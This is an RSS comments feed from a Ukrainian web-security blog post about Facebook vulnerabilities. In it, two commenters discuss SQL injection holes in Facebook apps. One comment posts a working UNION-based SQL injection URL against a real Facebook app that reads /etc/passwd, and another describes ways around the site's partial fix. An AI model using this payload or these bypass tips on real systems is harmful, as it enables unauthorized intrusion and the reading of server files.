<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress/MustLive Edition" -->
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
	<title>Коментарі для запису: Новини: російські хакери, атаки в Facebook та студент-хакер</title>
	<link>http://websecurity.com.ua/4424/</link>
	<description></description>
	<pubDate>Sat, 18 Apr 2026 13:19:59 +0000</pubDate>
	<generator>http://wordpress.org/?v=MustLive Edition</generator>

	<item>
		<title>від: MustLive</title>
		<link>http://websecurity.com.ua/4424/#comment-330854</link>
		<pubDate>Mon, 02 Aug 2010 18:13:17 +0000</pubDate>
		<guid>http://websecurity.com.ua/4424/#comment-330854</guid>
					<description>Так вони молодці.

&lt;blockquote&gt;взагалі в аппс на фейсі багато скулій.
декілька разів на них натикався.&lt;/blockquote&gt;
Так може ти знайдеш там свою нову SQLi і похакаєш Facebook як це двічі зробили хлопці з Inj3ct0r team :-).

Схоже, що на apps хостяться скрипти різних розробників додатків під Facebook, тому й дірок там багато. Компанії варто більше слідкувати за безпекою і також перевіряти всі скрипти від сторонніх розробників.</description>
		<content:encoded><![CDATA[<p>Так вони молодці.</p>
<blockquote><p>взагалі в аппс на фейсі багато скулій.<br />
декілька разів на них натикався.</p></blockquote>
<p>Так може ти знайдеш там свою нову SQLi і похакаєш Facebook як це двічі зробили хлопці з Inj3ct0r team <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> .</p>
<p>Схоже, що на apps хостяться скрипти різних розробників додатків під Facebook, тому й дірок там багато. Компанії варто більше слідкувати за безпекою і також перевіряти всі скрипти від сторонніх розробників.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: spayder</title>
		<link>http://websecurity.com.ua/4424/#comment-330827</link>
		<pubDate>Mon, 02 Aug 2010 13:43:11 +0000</pubDate>
		<guid>http://websecurity.com.ua/4424/#comment-330827</guid>
					<description>так саме вони.
взагалі в аппс на фейсі багато скулій. 
декілька разів на них натикався.</description>
		<content:encoded><![CDATA[<p>так саме вони.<br />
взагалі в аппс на фейсі багато скулій.<br />
декілька разів на них натикався.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: MustLive</title>
		<link>http://websecurity.com.ua/4424/#comment-330826</link>
		<pubDate>Mon, 02 Aug 2010 13:36:40 +0000</pubDate>
		<guid>http://websecurity.com.ua/4424/#comment-330826</guid>
					<description>Як я виявив, це одна з уразливостей нещодавно знайдених Inj3ct0r team на Facebook ;-). Вони молодці, вже друге знаходять серйозні дірки на Facebook.</description>
		<content:encoded><![CDATA[<p>Як я виявив, це одна з уразливостей нещодавно знайдених Inj3ct0r team на Facebook <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> . Вони молодці, вже друге знаходять серйозні дірки на Facebook.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: MustLive</title>
		<link>http://websecurity.com.ua/4424/#comment-330825</link>
		<pubDate>Mon, 02 Aug 2010 13:12:49 +0000</pubDate>
		<guid>http://websecurity.com.ua/4424/#comment-330825</guid>
					<description>&lt;strong&gt;spayder&lt;/strong&gt;

Молодець. Ти сам знайшов дірку, я сподіваюся :-).

&lt;a href="/2034/" rel="nofollow"&gt;XSS на Facebook&lt;/a&gt; я знаходив (на основному домені facebook.com), але SQLi (нехай і на домені apps.facebook.com) - це круто. І це несерйозно для Facebook мати такі дірки.

Зазначу, що вони спробували частково пофіксити дірку - прибрали можливість використовувати одинарні лапки разом зі слешами для вказання шляху (блокують). Але це обходиться (методом з 16-м записом, або методом з char). Хоча, як я перевірив, одинарні лапки працюють, просто це в них періодично блокування виникає (з обхідними методами також іноді виникає блокування, але рідше). Так що виправити дірку вони поки ще не спромоглися.</description>
		<content:encoded><![CDATA[<p><strong>spayder</strong></p>
<p>Молодець. Ти сам знайшов дірку, я сподіваюся <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> .</p>
<p><a href="/2034/" rel="nofollow">XSS на Facebook</a> я знаходив (на основному домені facebook.com), але SQLi (нехай і на домені apps.facebook.com) - це круто. І це несерйозно для Facebook мати такі дірки.</p>
<p>Зазначу, що вони спробували частково пофіксити дірку - прибрали можливість використовувати одинарні лапки разом зі слешами для вказання шляху (блокують). Але це обходиться (методом з 16-м записом, або методом з char). Хоча, як я перевірив, одинарні лапки працюють, просто це в них періодично блокування виникає (з обхідними методами також іноді виникає блокування, але рідше). Так що виправити дірку вони поки ще не спромоглися.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: spayder</title>
		<link>http://websecurity.com.ua/4424/#comment-330791</link>
		<pubDate>Sun, 01 Aug 2010 22:09:10 +0000</pubDate>
		<guid>http://websecurity.com.ua/4424/#comment-330791</guid>
					<description>j4f
http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--</description>
		<content:encoded><![CDATA[<p>j4f<br />
<a href="http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE" rel="nofollow">http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE</a>(&#8217;/etc/passwd&#8217;),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30&#8211;
</p>
]]></content:encoded>
				</item>
</channel>
</rss>
